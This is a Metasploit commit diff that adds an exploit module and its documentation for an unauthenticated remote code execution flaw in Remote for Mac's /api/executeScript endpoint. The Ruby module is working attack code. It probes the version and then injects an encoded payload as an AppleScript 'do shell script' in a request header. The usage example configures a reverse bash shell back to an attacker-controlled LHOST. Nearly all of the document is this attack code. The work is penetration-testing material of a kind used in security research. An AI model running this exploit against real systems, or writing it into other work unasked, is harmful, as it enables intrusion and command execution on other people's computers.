Land rapid7#20256, adds RCE module for Remote For Mac 2025.7

msutovsky-r7 · web-flow · commit f20e72b6c8b2 · 2025-06-08T16:03:58.000+02:00
Add Remote for Mac 2025.6 unauthenticated RCE module
diff --git a/documentation/modules/exploit/osx/http/remote_for_mac_rce.md b/documentation/modules/exploit/osx/http/remote_for_mac_rce.md
@@ -0,0 +1,40 @@
+# Module Documentation: Remote for Mac 2025.6 - Unauthenticated RCE
+
+## Overview
+
+This module exploits an unauthenticated remote code execution (RCE) vulnerability in **Remote for Mac 2025.6**. When the **"Allow unknown devices"** setting is enabled (disabled by default), the `/api/executeScript` endpoint allows unauthenticated attackers to execute arbitrary AppleScript commands, including shell commands, on the target macOS system.
+
+**Exploit Author:** [Chokri Hammedi](https://packetstormsecurity.com/files/195347/)
+
+**Module Path:** `modules/exploits/osx/http/remote_for_mac_rce.rb`
+
+## Vulnerable Application
+
+- **Vendor:** Evgeny Cherpak
+- **Homepage:** [https://cherpake.com/](https://cherpake.com/)
+- **Download:** [https://cherpake.com/latest.php?os=mac](https://cherpake.com/latest.php?os=mac)
+- **Affected Version:** Remote for Mac 2025.6
+- **Tested on:** macOS Mojave 10.14.6
+
+## Vulnerability Details
+
+- **Endpoint:** `/api/executeScript`
+- **Vulnerability:** Missing authentication
+- **Trigger Condition:** The app must have **"Allow unknown devices"** enabled.
+- **Impact:** Full command execution as the logged-in user.
+
+The exploit sends a specially crafted GET request with AppleScript payload headers to the unauthenticated endpoint. The server executes the `do shell script` AppleScript, leading to remote command execution.
+
+## Usage Example
+
+From within `msfconsole`:
+
+```bash
+use exploit/osx/http/remote_for_mac_rce
+set RHOSTS 192.168.1.100
+set RPORT 443
+set SSL true
+set PAYLOAD cmd/unix/reverse_bash
+set LHOST 192.168.1.50
+run
+
diff --git a/modules/exploits/osx/http/remote_for_mac_rce.rb b/modules/exploits/osx/http/remote_for_mac_rce.rb
@@ -0,0 +1,106 @@
+require 'json'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Remote for Mac Unauthenticated RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated remote code execution vulnerability in
+          Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint.
+          When authentication is disabled on the target system, it allows attackers to execute
+          arbitrary AppleScript commands, which can include shell commands via `do shell script`.
+          All versions up to 2025.7 (including patch versions) are vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Chokri Hammedi (@blue0x1)'],
+        'References' => [
+          ['PACKETSTORM', '195347']
+        ],
+        'DisclosureDate' => '2025-05-27',
+        'Platform' => ['unix', 'osx'],
+        'Arch' => ARCH_CMD,
+        'Targets' => [['Auto', {}]],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'getVersion'),
+      'method' => 'GET'
+    )
+
+    return CheckCode::Unknown('No response from target') unless res&.code == 200
+
+    info = res.get_json_document
+
+    if info.empty?
+      return CheckCode::Unknown('Unable to parse JSON from /api/getVersion')
+    end
+
+    if info['requires.auth'] == true
+      return CheckCode::Safe('Target requires authentication on /api/executeScript')
+    end
+
+    version = info['version'].to_s
+    if version.empty?
+      return CheckCode::Unknown('Could not determine target version')
+    end
+
+    target_version = Rex::Version.new(version)
+    vulnerable_version = Rex::Version.new('2025.7')
+
+    if target_version <= vulnerable_version
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe("Target version #{version} is not vulnerable")
+    end
+  end
+
+  def exploit
+    print_status("Generating reverse shell payload for #{datastore['LHOST']}:#{datastore['LPORT']}")
+    cmd = payload.encoded
+    applescript = %(do shell script "#{cmd}")
+
+    host_name = Rex::Text.rand_text_alpha(8)
+    host_model = "#{Rex::Text.rand_text_alpha(4)}#{rand(99)}"
+    script_name = Rex::Text.rand_text_alpha(8)
+
+    print_status("Sending exploit to #{rhost}:#{rport} via AppleScript")
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'api', 'executeScript'),
+      'method' => 'GET',
+      'headers' => {
+        'X-ClientToken' => Rex::Text.rand_text_numeric(4),
+        'X-HostName' => host_name,
+        'X-HostFullModel' => host_model,
+        'X-Script' => applescript,
+        'X-ScriptName' => script_name,
+        'X-ScriptDelay' => '0'
+      }
+    )
+
+    print_status('Payload sent')
+    if res&.code == 200
+      print_good('Payload delivered successfully. Awaiting session...')
+      res_json = res.get_json_document
+      print_status("Received response: #{res_json['result']}")
+    end
+  end
+end
